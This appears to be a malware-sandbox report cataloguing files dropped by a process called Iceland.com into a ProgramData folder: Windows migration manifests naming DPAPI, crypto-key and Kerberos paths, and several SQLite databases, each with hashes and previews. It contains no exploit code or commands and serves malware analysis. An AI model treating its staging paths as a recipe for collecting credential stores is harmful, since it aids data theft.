                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Security-NGC-PopKeySrv".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. offlineApply="no".. scope="Upgrade,Data".. settingsVersion="3".. replacementSettingsVersionRange="0-2" .. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\* [*]</pattern>.. </objectSet>.. </include>.. </rules>.. </migXml>.. </migration>..</assembly>..

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\9ZMGDJ

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3019
                                                                                                                                                                                                                                                              Entropy (8bit):4.884926762491409
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:22e8z2j+YgfH0LeIg6aFnJmINGbYgaFnQ7sPvh27+QgL7sYN2b4waFnw+:22X2qD0SPJv1/Pvh2S/pVN
                                                                                                                                                                                                                                                              MD5:63F04FB9936532B21E616E88E3EBED14
                                                                                                                                                                                                                                                              SHA1:56CEC96A0D4B10C6FC28C726B76BEF278CBC512F
                                                                                                                                                                                                                                                              SHA-256:61C5B3D0FD4051236AD00A0A39BE2F75F7E0DEC2AFBFF85617AED19AEF3FC650
                                                                                                                                                                                                                                                              SHA-512:66FF4756CE723378126DC6C1EC493B665D08387B3305A97ED9A80500CCCE6001DFB7F8957E8246C7C572D0362DA49EEC7AF8451B849F9E0E89FD8E14041CE75D
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Extensible-Authentication-Protocol-Host-Service".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0".. replacementVersionRange="6.0-6.1.7150".. scope="Upgrade,MigWiz,USMT".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Methods\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Configuration\

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\9ZMY5P

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2829
                                                                                                                                                                                                                                                              Entropy (8bit):5.130068712095974
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:/2e8G+F0Vg8DIIgPdunPduPPduNJ7IgfCfikfidjikjirJu/MY4C5uXC5u/C5upL:/29F+cO0Mf7Rwiai5ieiFEMAQSQaQwX4
                                                                                                                                                                                                                                                              MD5:CD55A48FE382A6820EC4FB55A66C2858
                                                                                                                                                                                                                                                              SHA1:70A0A7B0E12DF915BD5E68FF0432637EFC2153DE
                                                                                                                                                                                                                                                              SHA-256:97838AB994B53DFADEEF63955EECB05A7F118C2066EF97B0B0EB7BB48A526451
                                                                                                                                                                                                                                                              SHA-512:37C6D78CCD807B04834659B5E796424C443B2C4F72481CB4080ED1BC5E6A954E47C4AF837A653DDAAFED2372C4FF60CE442170EA58586AB93C57B841449C5195
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. name="Microsoft-Windows-Crypto-keys".. version="0.0.0.0".. processorArchitecture="*".. language="neutral".. />.. <migration scope="Upgrade,MigWiz,USMT" .. replacementVersionRange="6.0-6.1".. replacementSettingsVersionRange="0".. settingsVersion="0" .. >.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\RSA\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\DSS\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\Keys[*]</pattern>.. </objectSet>.. </include>.. </rules>..

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\BIEUAA

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1468
                                                                                                                                                                                                                                                              Entropy (8bit):5.0065780470180306
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
                                                                                                                                                                                                                                                              MD5:E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
                                                                                                                                                                                                                                                              SHA1:A1120341BB4452FCA47EB5EA8FA62A08BFC48073
                                                                                                                                                                                                                                                              SHA-256:A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
                                                                                                                                                                                                                                                              SHA-512:69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\CJW47Q

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4309
                                                                                                                                                                                                                                                              Entropy (8bit):5.059776328378613
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:22CBzmeQiHRAQgXx9QgXcOaBIpghKkQlwYBwkbsgo9:MmCZy7BhA
                                                                                                                                                                                                                                                              MD5:3A9306662FE93D09B05B9AE44128BCF1
                                                                                                                                                                                                                                                              SHA1:77A917FFE8FF0EAAD8F3D3B764836C810E4C9DF5
                                                                                                                                                                                                                                                              SHA-256:1988183ECBC3C6987DA9CB598C78B52D7563D995FA94D1E91E0470392E765374
                                                                                                                                                                                                                                                              SHA-512:DA1F2776E8D1E08076032365B0D463DC847A31C6C360181D9966488455E878C7738DEC6F2B39153B2A410E3BEB73A05EB524593D125077273343740826A7B9F9
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-dpapi-keys".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. scope="Upgrade,MigWiz,USMT,Data".. settingsVersion="1".. replacementSettingsVersionRange="0" .. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect [CREDHIST]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect\* [Preferred]</pattern>.. </objectSet>.. </include>.. <merge script="MigXmlHelper.DestinationPriority()">.. <objectSet>..

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\DJMOZC

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1065
                                                                                                                                                                                                                                                              Entropy (8bit):4.96984082363901
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:p/o2e8ZF2YS+pg0cjh3N1LRMEF4wuSb3wuyBX0FCUK:22e8z2j+pgfZlMY4Qr0B2A
                                                                                                                                                                                                                                                              MD5:4DBFCA3B87A59186D2612A95CA2CD899
                                                                                                                                                                                                                                                              SHA1:4C84BD2D60CE789B44070CDDC296C09D2F52B1CC
                                                                                                                                                                                                                                                              SHA-256:2C229D8DA31E17FCEF244A8A2029CA8FE8374738A9ECBFED9E23FB89DB8DF059
                                                                                                                                                                                                                                                              SHA-512:704ECDBE3FC38AC3807946072C7C523C36B4AF1586BEFE01A87BBBF35CF20214A0E0DE892A56E74FE8AA806154D7D2B9CC7028AEF47BEC326564B5F18CD12421
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-OneCore-TetheringService".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. replacementSettingsVersionRange="0".. settingsVersion="1".. alwaysProcess="Yes".. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Roaming\*[*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Settings\*[*]</pattern>.. </objectSet>.. </include>.. </rules>..

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\DT2DT2

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1095
                                                                                                                                                                                                                                                              Entropy (8bit):4.976174799333973
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
                                                                                                                                                                                                                                                              MD5:ECC51190BD585AB376691BBDDF2A638B
                                                                                                                                                                                                                                                              SHA1:84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
                                                                                                                                                                                                                                                              SHA-256:6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
                                                                                                                                                                                                                                                              SHA-512:C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\HVAI5F

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\HVKX4W

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2947
                                                                                                                                                                                                                                                              Entropy (8bit):5.120077314818075
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
                                                                                                                                                                                                                                                              MD5:C7E301D9DD77A21C1CDBD73A63AF205C
                                                                                                                                                                                                                                                              SHA1:715D25AA0C06B2AD162F52A8DE06FB5040C389B1
                                                                                                                                                                                                                                                              SHA-256:239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
                                                                                                                                                                                                                                                              SHA-512:B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\JMOZCB

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):126976
                                                                                                                                                                                                                                                              Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\KXB1DT

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4533
                                                                                                                                                                                                                                                              Entropy (8bit):5.1021772201912805
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                                                                                                                                                                                                              MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                                                                                                                                                                                                              SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                                                                                                                                                                                                              SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                                                                                                                                                                                                              SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\OHL68Q

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2062
                                                                                                                                                                                                                                                              Entropy (8bit):4.925445222257812
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
                                                                                                                                                                                                                                                              MD5:60145F68B1CF9440FA663820AE11CE4B
                                                                                                                                                                                                                                                              SHA1:10195A2926015E3024D769673E004AA60DFEC0A3
                                                                                                                                                                                                                                                              SHA-256:4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
                                                                                                                                                                                                                                                              SHA-512:55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="*".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\PHVAI5

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\PP8Y5F

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1941
                                                                                                                                                                                                                                                              Entropy (8bit):4.861537145678193
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:22e8v+phDgrcHreIg/0xJ9U3C0gcj0kqIg/0xJuX:22CphPHyx0ruS0N0kqx0rQ
                                                                                                                                                                                                                                                              MD5:6F0056EC818D4FC20158F3FF190D6D6A
                                                                                                                                                                                                                                                              SHA1:9E2108FE560CC2187395C5EED011559D201CE45D
                                                                                                                                                                                                                                                              SHA-256:2F9596801DBE57D73C292BE4F93BD0C05F6D0A44C7A45F5F03FDBE35993B7DEC
                                                                                                                                                                                                                                                              SHA-512:72C193919EC4402D430CCBCC4F9A9B25DC9AAECBCCAEE666EFE20DA4133964D2382F1090EEB8FB0A3073ACAA7825AF7A62B59447D29F912A19BD4C04CDDF1AD1
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-CertificateAuthority-Enrollment-ServerUpgrade".. processorArchitecture="*".. version="1.0.0.0".. versionScope="nonSxS".. />.. <migration.. alwaysProcess="yes".. replacementSettingsVersionRange="0".. replacementVersionRange="6.1.*".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\Software\Microsoft\ADCS\CES [ConfigurationStatus]</pattern>.. </objectSet>.. </include>.. </rules>.. <rules context="System">.. <detects>.. <detect>.. Detection of CES. -

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\T0HDJM7QQ

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\T2DB1D

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
